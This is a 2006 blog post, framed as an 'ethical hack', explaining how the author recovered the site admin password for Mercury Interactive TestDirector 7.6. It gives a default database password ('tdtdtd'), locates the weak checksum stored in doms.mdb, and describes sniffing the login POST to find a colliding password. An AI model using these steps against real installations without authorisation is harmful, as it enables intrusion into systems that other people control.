Sponsored Links

Ethical Hacks: How to find the site admin password for Mercury Interactive's TestDirector v7.6 PDF Print E-mail
Thursday, 17 August 2006 23:31
IMPORTANT NOTE:The information presented here is to be used only for legitimate cases of access loss. Using these instructions to gain access to a system without permission is a violation of both state and Federal law.

At one of my old jobs as a security engineer, I was asked to find the admin password for an application (seems the company had managed to lay off everyone who actually knew it). This is an example of an "ethical hack", where techniques used by malicious people have legitimate application in the real world

TestDirector 7.6 stores all it's usernames, passwords, groups, and other metadata in MS Access databases. Now the standard database for the users is usually something like "Testdir.mdb" somewhere in the directory tree of the application suite. However, the admin password is usually stored in a database called "doms.mdb" which you should find in "c:program filescommon filesmercury interactiveDomsinfo".

Load the doms.mdb up into MS Access. You'll be prompted for a password. Try using "tdtdtd", but if that doesn't work all you need is tool for cracking MS Office passwords. Passware works great, though it's not free.

Once you have the database open, look in the ADMIN table. You'll see a field called "ADMIN_PSWD", and at least one record with a value for that field. The value will be six-digit number like "459999". That's the checksum value of the password that's been set. Yes, this is a crummy scheme and has a lot of password space collision. Luck for us!

Next, you need to setup Ethereal (or some other sniffer) on your local PC. Configure it to only sniff traffic to/from the IP of your TestDirector server. Go to the site admin webpage on your TestDirector server (usually something like http://server/tdbin/SiteAdmin.htm) and try logging in. Once you get an unauthorized login message, go to your sniffer and check the results. You should see some HTTP traffic back and forth between your client and the server. You're looking for the HTTP Post from your PC to the server that includes the string "password : ". The POST will be to "/tdbin/wdomsrv.dll/TDAPI_GeneralWebTreatment". Immediately after the "password : " you should see a six digit number. That will be the checksummed value of the password you tried to login as.

So now you know what value the server is expecting and what value your password generates. A bit of trial and error should allow you to find a password that will result in the same checksum and grant you access. For example, I found that incrementing or decrementing the first character in the password (i.e. a to b, or c to b) would increment/decrement the checksum value by 4. I didn't bother to do a lengthy analysis and determine the exact checksum method, but it's pretty simple, not utilizing any time elements. It does seem to vary depending on total password length.

Of course, this will be much more difficult if your access to the server is via https instead of http.

Originally Written June 29th, 2005 - Cleaned Up August 17th, 2006